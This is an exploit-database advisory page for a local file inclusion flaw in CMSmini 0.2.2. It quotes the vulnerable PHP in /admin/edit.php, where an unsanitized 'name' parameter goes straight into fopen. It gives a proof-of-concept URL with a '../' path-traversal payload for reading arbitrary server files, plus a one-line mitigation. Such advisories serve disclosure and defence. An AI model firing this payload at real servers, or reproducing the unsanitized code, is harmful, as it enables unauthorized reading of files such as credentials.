header-logo
Suggest Exploit
vendor:
CMSmini
by:
I2Sec5-BSK
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: CMSmini
Affected Version From: CMSmini 0.2.2
Affected Version To: CMSmini 0.2.2
Patch Exists: NO
Related CWE: N/A
CPE: a:cmsmini:cmsmini:0.2.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2011

CMSmini 0.2.2 Local File Inclusion

CMSmini 0.2.2 is vulnerable to Local File Inclusion. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious file path in the 'name' parameter of the 'edit.php' script. This will allow the attacker to read any file on the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

# Exploit Title: [CMSmini 0.2.2 Local File Inclusion]
# Date: [2011.10.20]
# Author: [I2Sec5-BSK]
# Software Link: [http://sourceforge.net/projects/cmsmini/]
# Version: [CMSmini 0.2.2]
# Tested on: [Windows XP]

--------------------------------------------------

/admin/edit.php

30 $name = $_GET['name'];
73 $filename = $dirpath.'/'.$name;
74 $fh = fopen($filename, 'r');
75 $data = fread($fh, filesize($filename));
76 fclose($fh);
77 echo $data;

---------------------------------------------------

POC : http://[ Address ]/admin/edit.php?name=../../../../../../../../../../../../[ Local File ]

Navigation

Suggest Exploit

Services By CQR